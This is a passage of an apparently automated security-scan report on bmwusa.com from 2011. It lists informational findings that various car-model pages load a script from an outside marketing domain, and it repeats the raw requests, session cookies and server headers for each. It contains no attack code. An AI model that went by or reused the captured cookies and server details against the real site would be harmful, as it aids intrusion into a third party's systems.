Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:44:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:04:24 GMT;path=/
Content-Length: 227015


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.129. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535isedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:43:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:03:51 GMT;path=/
Content-Length: 215504


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.130. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:58:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:24 GMT;path=/
Content-Length: 202297


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.131. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:36 GMT;path=/
Content-Length: 202298


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.132. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivegt/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:56:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:16:14 GMT;path=/
Content-Length: 215086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.133. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:07 GMT;path=/
Content-Length: 215087


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.134. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivegt/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:56:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:16:01 GMT;path=/
Content-Length: 229148


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.135. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:20 GMT;path=/
Content-Length: 215501


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.136. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:12 GMT;path=/
Content-Length: 215502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.137. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/5seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivesedan/5seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535ixdrivesedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:22 GMT;path=/
Content-Length: 201982


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.138. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:00 GMT;path=/
Content-Length: 214938


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.139. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivesedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:32 GMT;path=/
Content-Length: 227353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.140. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivesedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:18 GMT;path=/
Content-Length: 216385


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.141. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/5seriesgranturismomediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550igt/5seriesgranturismomediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550igt/5seriesgranturismomediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:59:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:19:51 GMT;path=/
Content-Length: 202083


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.142. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550igt/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550igt/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
